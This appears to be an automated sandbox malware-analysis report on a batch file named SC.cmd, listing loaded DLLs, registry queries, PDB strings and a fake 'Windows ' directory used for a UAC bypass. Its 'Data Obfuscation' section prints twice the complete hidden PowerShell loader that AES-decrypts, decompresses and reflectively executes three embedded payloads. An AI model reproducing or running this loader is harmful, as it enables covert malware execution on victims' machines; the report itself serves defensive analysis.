Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: version.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: twinui.appcore.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bthavctpsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wpprecorderum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior
Source: SC.cmdStatic file information: File size 1962270 > 1048576
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ComputerDefaults.pdbGCTL source: ComputerDefaults.exe, 0000000A.00000000.1880937307.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmp, ComputerDefaults.exe, 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmp, ComputerDefaults.exe.3.dr
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000004.00000002.1768282215.000001823BF2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdbrzO source: powershell.exe, 00000004.00000002.1769630197.000001823C2E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb> source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\uyfguyi\source\repos\Dll1\x64\Release\Dll1.pdb source: MLANG.dll.3.dr, MLANG.dll0.3.dr
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb)2Oa+IP source: powershell.exe, 00000004.00000002.1769630197.000001823C2E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ComputerDefaults.pdb source: ComputerDefaults.exe, 0000000A.00000000.1880937307.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmp, ComputerDefaults.exe, 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmp, ComputerDefaults.exe.3.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb4-)* source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb1S=*r source: powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbd source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb3+#* source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768282215.000001823BF8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb( source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbiS source: powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $ElTgO.CopyTo($FyATo); $ElTgO.Dispose(); $bNhXj.Dispose(); $FyATo.Dispose(); $FyATo.ToArray();}function execute_function($param_var,$param2_var){ IEX '$dVsPd=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$DUzhZ=$dVsPd.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$DUzhZ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$EYouL = 'C:\Users\user\Desktop\SC.cmd';$host.UI.RawUI.WindowTitle = $EYouL;$tjLTM=[System.IO.File]::ReadAllText($EYouL).Split([Environment]::NewLine);foreach ($xbxfP in $tjLTM) { if ($xbxfP.StartsWith('DzoRhmGmBqXlnTxyAcGU')) { $murOL=$xbxfP.Substring(20); break; }}$payloads_var=[string[]]$murOL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $ElTgO.CopyTo($FyATo); $ElTgO.Dispose(); $bNhXj.Dispose(); $FyATo.Dispose(); $FyATo.ToArray();}function execute_function($param_var,$param2_var){ IEX '$dVsPd=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$DUzhZ=$dVsPd.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$DUzhZ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$EYouL = 'C:\Users\user\Desktop\SC.cmd';$host.UI.RawUI.WindowTitle = $EYouL;$tjLTM=[System.IO.File]::ReadAllText($EYouL).Split([Environment]::NewLine);foreach ($xbxfP in $tjLTM) { if ($xbxfP.StartsWith('DzoRhmGmBqXlnTxyAcGU')) { $murOL=$xbxfP.Substring(20); break; }}$payloads_var=[string[]]$murOL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8BD96D push eax; ret 4_2_00007FFD9B8BDA69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8C095D push esp; retf 4_2_00007FFD9B8C095E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8BD9D3 push eax; ret 4_2_00007FFD9B8BDA69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B785E push eax; iretd 4_2_00007FFD9B8B786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B776A pushad ; iretd 4_2_00007FFD9B8B785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B77D2A5 pushad ; iretd 5_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B890D05 push eax; retf 5_2_00007FFD9B890D4D
